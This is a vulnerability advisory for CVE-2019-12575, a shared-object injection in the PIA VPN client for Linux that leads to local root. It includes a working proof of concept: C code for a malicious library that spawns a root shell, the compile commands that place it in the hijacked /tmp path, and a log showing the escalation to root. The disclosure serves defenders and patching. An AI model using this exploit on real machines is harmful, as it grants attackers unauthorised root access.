Allele Security Alert
ASA-2019-00381
Identifier(s)
ASA-2019-00381, CVE-2019-12575
Title
Shared Object Injection
Vendor(s)
London Trust Media
Product(s)
Private Internet Access (PIA) VPN Client
Affected version(s)
Private Internet Access (PIA) VPN Client for Linux version v82
Fixed version(s)
Private Internet Access (PIA) VPN Client for Linux version v1.2.1 or later
Proof of concept
Yes
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux could allow an authenticated, local attacker to run arbitrary code with elevated privileges.
Technical details
The PIA Linux binary root_runner.64 is setuid root. This binary executes /opt/pia/ruby/64/ruby which in turn attempts to load several libraries under /tmp/ruby-deploy.old/lib. A local unprivileged user can create a malicious library under this path to execute arbitrary code as the root user.
All steps are executed as a low privileged user.
Step 1 – Create the following directory
mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc
Step 2 – Create woot.c to execute a shell when loaded
cat >woot.c<<EOF #include <stdlib.h> #include <sys/types.h> #include <unistd.h>
void woot(){ setreuid(0,0); execl("/bin/sh","/bin/sh",NULL); } EOF
Step 3 – Compile the malicious library.
gcc -fPIC -o woot.o -Wall -c woot.c gcc -Wall \ -shared \ -Wl,-soname,encdb.so.so \ -Wl,-init,woot \ -o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o
Step 4 – execute root_runner.64
/opt/pia/root_runner/root_runner.64
Example
user1@woot:~$ id uid=1001(user1) gid=1001(user1) groups=1001(user1) user1@woot:~$ ./pia-ruby-exploit.sh + LIBPATH=/tmp/ruby-deploy/lib/ruby/2.4.0/enc + mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc + cat + gcc -fPIC -o woot.o -Wall -c woot.c + gcc -Wall -shared -Wl,-soname,encdb.so.so -Wl,-init,woot -o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o + /opt/pia/root_runner/root_runner.64 # id uid=0(root) gid=1001(user1) groups=1001(user1) #
Credits
Rich Mirch
Reference(s)
PIA Linux, macOS Privilege Escalation: Shared Object Injection
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12575.txt
CVE-2019-12575
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12575
CVE-2019-12575
https://nvd.nist.gov/vuln/detail/CVE-2019-12575
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: June 25, 2019